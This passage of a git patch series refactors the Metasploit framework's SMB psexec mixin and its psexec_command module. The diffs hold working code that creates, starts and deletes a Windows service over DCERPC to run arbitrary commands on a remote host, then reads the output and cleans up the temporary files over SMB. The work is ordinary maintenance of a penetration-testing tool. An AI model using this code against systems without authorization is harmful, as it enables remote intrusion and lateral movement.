+ NDR.wstring(servicename) + NDR.long(0xF01FF) response = dcerpc.call(0x10, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil svc_handle = dcerpc.last_response.stub_data[0,20] @@ -108,8 +117,7 @@ def psexec(command) return false end vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) + stubdata = svc_handle + NDR.long(0) + NDR.long(0) begin response = dcerpc.call(0x13, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil @@ -119,8 +127,7 @@ def psexec(command) return false end vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle + stubdata = svc_handle begin response = dcerpc.call(0x02, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil @@ -139,52 +146,6 @@ def psexec(command) return true end - - # This method is called by file_dropper to remove files droped - # By your module - # - # @example - # file_rm('C:\WINDOWS\Temp\output.txt') - # - # @param file [String] Full path to a file on the remote host - # @return [StandardError] only in the event of an error - def file_rm(file) - delete = "%COMSPEC% /C del #{file}" - vprint_status("#{peer} - Deleting #{file}") - psexec(delete) - end - - - # This method stores files in an Instance array - # The files are then deleted from the remote host once - # the cleanup_after method is called - # - # @example - # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") - # @param file [String] Full path to the file on the remote host - def register_file_for_cleanup(*file) - @dropped_files ||= [] - @dropped_files += file - end - - - # This method removes any files that were dropped on the remote system - # and marked with the register_file_for_cleanup method - def cleanup_after - print_status("#{peer} - Removing files dropped by your module/exploit") - if !@dropped_files - return - end - begin - @dropped_files.delete_if do |file| - file_rm(file) - print_good("#{peer} - Deleted #{file}") - end - rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanup_error - print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") - end - end - end end diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index 00f17808c106..f249af1ed23c 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -18,6 +18,8 @@ module Msf module Exploit::Remote::SMB + require 'msf/core/exploit/psexec' + include Exploit::Remote::Tcp include Exploit::Remote::NTLM::Client @@ -90,6 +92,13 @@ def initialize(info = {}) register_autofilter_services(%W{ netbios-ssn microsoft-ds }) end + # Override {Exploit::Remote::Tcp#connect} to setup an SMB connection + # and configure evasion options + # + # Also populates {#simple}. + # + # @param (see Exploit::Remote::Tcp#connect) + # @return (see Exploit::Remote::Tcp#connect) def connect(global=true) disconnect() if global @@ -132,7 +141,12 @@ def unicode(str) Rex::Text.to_unicode(str) end - # This method establishes a SMB session over the default socket + # Establishes an SMB session over the default socket and connects to + # the IPC$ share. + # + # You should call {#connect} before calling this + # + # @return [void] def smb_login simple.login( datastore['SMBName'], @@ -217,13 +231,55 @@ def splitname(uname) end end + # Whether a remote file exists + # + # @param file [String] Path to a file to remove, relative to the + # most-recently connected share + # @raise [Rex::Proto::SMB::Exceptions::ErrorCode] + def smb_file_exist?(file) + begin + fd = simple.open(file, 'ro') + rescue XCEPT::ErrorCode => e + # If attempting to open the file results in a "*_NOT_FOUND" error, + # then we can be sure the file is not there. + # + # Copy-pasted from smb/exceptions.rb to avoid the gymnastics + # required to pull them out of a giant inverted hash + # + # 0xC0000034 => "STATUS_OBJECT_NAME_NOT_FOUND", + # 0xC000003A => "STATUS_OBJECT_PATH_NOT_FOUND", + # 0xC0000225 => "STATUS_NOT_FOUND", + error_is_not_found = [ 0xC0000034, 0xC000003A, 0xC0000225 ].include?(e.error_code) + # If the server returns some other error, then there was a + # permissions problem or some other difficulty that we can't + # really account for and hope the caller can deal with it. + raise e unless error_is_not_found + found = !error_is_not_found + else + # There was no exception, so we know the file is openable + fd.close + found = true + end + + found + end + + # Remove remote file + # + # @param file (see #smb_file_exist?) + # @return [void] + def smb_file_rm(file) + fd = smb_open(file, 'ro') + fd.delete + end + # # Fingerprinting methods # - # This method the EnumPrinters() function of the spooler service + # Calls the EnumPrinters() function of the spooler service def smb_enumprinters(flags, name, level, blen) stub = NDR.long(flags) + @@ -632,10 +688,7 @@ def smb_fingerprint fprint end - # - # Accessors - # - + # @return [Rex::Proto::SMB::SimpleClient] attr_accessor :simple end @@ -785,7 +838,6 @@ def smb_error(cmd, c, errorclass, esn = false) c.put(pkt.to_s) end - end diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 1bc21c97c359..15e51b112e3f 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -4,12 +4,12 @@ class Metasploit3 < Msf::Auxiliary - # Exploit mixins should be called first + include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::Remote::Psexec include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - include Msf::Exploit::Remote::DCERPC # Aliases for common classes SIMPLE = Rex::Proto::SMB::SimpleClient @@ -58,213 +58,72 @@ def peer # This is the main controle method def run_host(ip) text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt" - bat = "%WINDIR%\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat" - smbshare = datastore['SMBSHARE'] + bat = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat" + @smbshare = datastore['SMBSHARE'] + @ip = ip - #Try and authenticate with given credentials + # Try and authenticate with given credentials if connect begin smb_login - rescue StandardError => autherror + rescue Rex::Proto::SMB::Exceptions::Error => autherror print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") return end - if execute_command(ip, text, bat) - get_output(smbshare, ip, text) + if execute_command(text, bat) + get_output(text) end - cleanup_after(smbshare, ip, text, bat) + cleanup_after(text, bat) disconnect end end # Executes specified Windows Command - def execute_command(ip, text, bat) + def execute_command(text, bat) + # Try and execute the provided command + execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}" + print_status("#{peer} - Executing the command...") begin - #Try and execute the provided command - execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" - print_status("#{peer} - Executing the command...") return psexec(execute) - rescue StandardError => exec_command_error + rescue Rex::Proto::SMB::Exceptions::Error => exec_command_error print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") return false end end # Retrive output from command - def get_output(smbshare, ip, file) - begin - print_status("#{peer} - Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - if output.empty? - print_status("#{peer} - Command finished with no output") - return - end - print_good("#{peer} - Command completed successfuly! Output:\r\n#{output}") - return - rescue StandardError => output_error - print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.") + def get_output(file) + print_status("#{peer} - Getting the command output...") + output = smb_read_file(@smbshare, @ip, file) + if output.nil? + print_error("#{peer} - Error getting command output. #{$!.class}. #{$!}.") return end - end - - # This is the cleanup method, removes .txt and .bat file/s created during execution- - def cleanup_after(smbshare, ip, text, bat) - begin - # Try and do cleanup command - cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup...") - psexec(cleanup) - if !check_cleanup(smbshare, ip, text) - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{text} and #{bat} from the target.") - else - print_status("#{peer} - Cleanup was successful") - end - rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands. Error: #{cleanuperror}") - print_error("#{peer} - Maybe you'll need to manually remove #{text} and #{bat} from the target") - return cleanuperror - end - end - - def check_cleanup(smbshare, ip, text) - simple.connect("\\\\#{ip}\\#{smbshare}") - begin - if checktext = simple.open(text, 'ro') - check = false - else - check = true - end - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return check - rescue StandardError => check_error - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return true + if output.empty? + print_status("#{peer} - Command finished with no output") + return end + print_good("#{peer} - Command completed successfuly! Output:") + print_line("#{output}") end - # This code was stolen straight out of psexec.rb. Thanks very much HDM and all who contributed to that module!! - # Instead of uploading and runing a binary. This method runs a single windows command fed into the COMMAND paramater - def psexec(command) - - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + - NDR.long(0) + - NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil - - stubdata = - scm_handle + - NDR.wstring(servicename) + - NDR.uwstring(displayname) + - - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception - end - - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + - NDR.wstring(servicename) + - NDR.long(0xF01FF) - - response = dcerpc.call(0x10, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + - NDR.long(0) + - NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) + # Removes files created during execution. + def cleanup_after(*files) + simple.connect("\\\\#{@ip}\\#{@smbshare}") + print_status("#{peer} - Executing cleanup...") + files.each do |file| + begin + smb_file_rm(file) + rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror + print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") end - - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") + left = files.collect{ |f| smb_file_exist?(f) } + if left.any? + print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + else + print_status("#{peer} - Cleanup was successful") end - - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true end end From 4703278183733aae69839846bbdb20a2adaaa6f0 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 19 Feb 2013 12:55:06 -0600 Subject: [PATCH 421/421] Move SMB mixins into their own directory --- lib/msf/core/exploit/dcerpc.rb | 2 +- lib/msf/core/exploit/smb.rb | 18 ++------------- lib/msf/core/exploit/smb/authenticated.rb | 22 +++++++++++++++++++ lib/msf/core/exploit/{ => smb}/psexec.rb | 5 +++-- modules/auxiliary/admin/smb/psexec_command.rb | 4 +--- 5 files changed, 29 insertions(+), 22 deletions(-) create mode 100644 lib/msf/core/exploit/smb/authenticated.rb rename lib/msf/core/exploit/{ => smb}/psexec.rb (97%) diff --git a/lib/msf/core/exploit/dcerpc.rb b/lib/msf/core/exploit/dcerpc.rb index 51b11c738bc5..ff700984bea9 100644 --- a/lib/msf/core/exploit/dcerpc.rb +++ b/lib/msf/core/exploit/dcerpc.rb @@ -21,7 +21,7 @@ module Exploit::Remote::DCERPC DCERPCPacket = Rex::Proto::DCERPC::Packet DCERPCClient = Rex::Proto::DCERPC::Client DCERPCResponse = Rex::Proto::DCERPC::Response - DCERPCUUID = Rex::Proto::DCERPC::UUID + DCERPCUUID = Rex::Proto::DCERPC::UUID NDR = Rex::Encoder::NDR diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index f249af1ed23c..6e24ea986eca 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -4,7 +4,6 @@ require 'rex/proto/dcerpc' require 'rex/encoder/ndr' - module Msf ### @@ -18,7 +17,8 @@ module Msf module Exploit::Remote::SMB - require 'msf/core/exploit/psexec' + require 'msf/core/exploit/smb/authenticated' + require 'msf/core/exploit/smb/psexec' include Exploit::Remote::Tcp include Exploit::Remote::NTLM::Client @@ -35,20 +35,6 @@ module Exploit::Remote::SMB DCERPCUUID = Rex::Proto::DCERPC::UUID NDR = Rex::Encoder::NDR - # Mini-mixin for making SMBUser/SMBPass/SMBDomain regular options vs advanced - # Included when the module needs credentials to function - module Authenticated - def initialize(info = {}) - super - register_options( - [ - OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), - OptString.new('SMBPass', [ false, 'The password for the specified username', '']), - OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', 'WORKGROUP']), - ], Msf::Exploit::Remote::SMB::Authenticated) - end - end - def initialize(info = {}) super diff --git a/lib/msf/core/exploit/smb/authenticated.rb b/lib/msf/core/exploit/smb/authenticated.rb new file mode 100644 index 000000000000..62bfdd470392 --- /dev/null +++ b/lib/msf/core/exploit/smb/authenticated.rb @@ -0,0 +1,22 @@ +# -*- coding: binary -*- + +module Msf + +# Mini-mixin for making SMBUser/SMBPass/SMBDomain regular options vs advanced +# Included when the module needs credentials to function +module Exploit::Remote::SMB::Authenticated + + include Msf::Exploit::Remote::SMB + + def initialize(info = {}) + super + register_options( + [ + OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), + OptString.new('SMBPass', [ false, 'The password for the specified username', '']), + OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', 'WORKGROUP']), + ], Msf::Exploit::Remote::SMB::Authenticated) + end +end + +end diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb similarity index 97% rename from lib/msf/core/exploit/psexec.rb rename to lib/msf/core/exploit/smb/psexec.rb index 58e678869595..3ba505c6cf93 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/smb/psexec.rb @@ -1,3 +1,4 @@ +# -*- coding: binary -*- require 'msf/core' require 'msf/core/exploit/dcerpc' @@ -11,10 +12,10 @@ module Msf # and runing a binary. #### -module Exploit::Remote::Psexec +module Exploit::Remote::SMB::Psexec include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::SMB::Authenticated # Retrives output from the executed command # diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 15e51b112e3f..54be82308fb8 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -5,9 +5,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB - include Msf::Exploit::Remote::SMB::Authenticated - include Msf::Exploit::Remote::Psexec + include Msf::Exploit::Remote::SMB::Psexec include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner